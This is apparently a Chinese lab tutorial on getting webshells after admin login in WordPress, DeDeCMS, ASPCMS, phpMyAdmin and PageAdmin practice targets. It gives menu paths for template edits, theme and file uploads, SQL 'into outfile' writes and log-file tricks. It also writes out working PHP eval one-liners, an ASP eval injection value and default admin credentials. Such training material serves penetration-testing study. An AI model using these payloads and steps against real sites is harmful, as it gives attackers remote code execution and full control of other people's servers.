⼀:WordPress
后台修改模板拿WebShell
进⼊Vulhub靶场并执⾏以下命令开启靶场;在浏览器中访问并安装
#执⾏命令
cd /vulhub/wordpress/pwnscriptum
docker-compose up -d
#靶场地址
思路是修改其WP的模板写⼊⼀句话⽊⻢后⻔并访问其⽂件即可GetShell;登陆WP后点击 【外
观】 --》 【编辑】 --》 404.php
在其404模板中插⼊⼀句话⽊⻢代码..点击 【更新⽂件】 按钮
访问以下连接即可获取WebShell
#拼接路径
/wp-content/themes/twentyfifteen/404.php
http://8.140.254.245:8080//wp-content/themes/twentyfifteen/404.php
上传主题拿WebShell
接着上⼀个环境使⽤...将带有后⻔的⽂件加⼊到主题中并将主题压缩为ZIP⽂件...点击 【外
观】 --》 【主题】 --》 【添加】 --》 【上传主题】 --》 【浏览】 --》 【现在安装】
我们先在网上下载一个主题
https://downloads.wordpress.org/theme/pedro.2.0.5.zip
然后写一个一句话木马1.php放入到我们下载的压缩包里面
安装成功后访问主题下的⽹站后⻔⽂件.
#拼接路径
/wp-content/themes/pedro/1.php
⼆:DeDeCMS
通过⽂件管理器上传WebShell
访问⽬标靶场其思路为 dedecms 后台可以直接上传任意⽂件,可以通过⽂件管理器上传
php⽂件获取webshell...
前台
http://172.16.2.32/
#后台
http://172.16.2.32/dede
#信息
username:admin
password:admin
登陆到后台点击 【核⼼】 --》 【⽂件式管理器】 --》 【⽂件上传】 将准备好的⼀句话代
码上传...OK
上传我们的一句话木马
访问上传成功后的⽂件并使⽤蚁剑连接测试...
修改模板⽂件拿WebShell
与WPCMS类似,直接修改模板拿WebShell..点击 【模板】 --》 【默认模板管理】 -
-》 【index.htm】 --> 【修改】 在⽂件修改中添加⼀句话代码....如下
点击 【⽣成】 --》 【更新主⻚HTML】 --》将主⻚位置修改为 【../index.php 】--》
点击 【⽣成静态】 --》点击 【更新主⻚】 再次访问站点⾸⻚可发现变化...
后台任意命令执⾏拿WebShell
点击 【模块】 --》 【⼴告管理】 --》 【增加⼀个新⼴告】 --》在 【⼴告内容】 处添
加⼀句话代码--》点击 【确定】
然后访问我们的广告用蚁剑连接
通过后台sql命令执⾏拿webshell
.访问系统---sql命令⾏⼯具---执⾏ select @@ basedir,获取mysql路径,由此瑞测⽹站绝对路径
into outfile写⼊⼀句话⽊⻢
select '<?php @eval($_POST[cmd]);?>' into outfile 'D:/phpstudy_pro/WWW/webshell.php’
如果生成不了文件可以看看数据库的配置文件my.ini中的secure_file_priv=的值是否为空
然后访问我们生成的php文件用蚁剑连接
三:ASPCMS
后台修改配置⽂件拿Shell
访问以下地址为ASPCMS...并登陆到后台(这⾥注意在搭建站点的时候注意权限问题)
http://172.16.2.32:8080/admin_aspcms
#账户密码
username:admin
password:123456
点击 【扩展功能】 --》 【幻灯⽚设置】 --》点击 【保存】 --》开启代理进⾏抓包
在抓取的数据包中修改 slideTextStatus 字段的值为以下代码并进⾏发包查看被修改的asp
⽂件内容...
影响⽂件
/config/AspCms_Config.asp
#字段值
1%25><%25Eval(Request (chr(65)))%25><%25 密码是a
访问以下地址进⾏连接
http://172.16.2.32:8080/config/aspcms_config.asp
四:PhPMyadmin
导⼊导出拿WebShell
通过SQL语句拿webshell ⽤ into outfile 把后⻔写到⽹站⽬录上。
1.⾸先判断mysql位置
select @@datadir
2.猜测web路径
猜测web路径:D:\phpstudy_pro\www
3.写webshell
select "<?php @eval($_POST[a]);?>" into outfile 'D:/phpstudy_pro/WWW/phpMyAdmin4.8.5/2.php';
然后访问我们生成的php文件用蚁剑连接
界⾯图像化GetShell
phpmyadmin管理台
变量:⽇志 搜索:gen
log:on
file:D:/phpstudy_pro/WWW/phpMyAdmin4.8.5/1.php
sql:
select "<?php eval($_POST[cmd]);?>";

五:Pageadmin
上传模块拿WebShell
访问 pageadmin 在后台可以上传模板,把webshell打包成zip上传模板,系统会⾃动解压,
成功会在后台存在后⻔,访问即可获取webshell 。 点击【应⽤】--》【 插件安装】--》【 上传⽂件
这⾥因为不是授权版本,⽆法上传,如果有授权版本的话就可以成功上传,上传后系统会⾃动解压,直
接访问shell地址就可以了:/Templates/1/1.aspx
上传⽂件解压拿WebShell
点击【⼯具】--》 【⽂件管理】--》 【功能菜单】 --》【上传⽂件】--》 【解压】
写一个asp的命令
访问我们上传的文件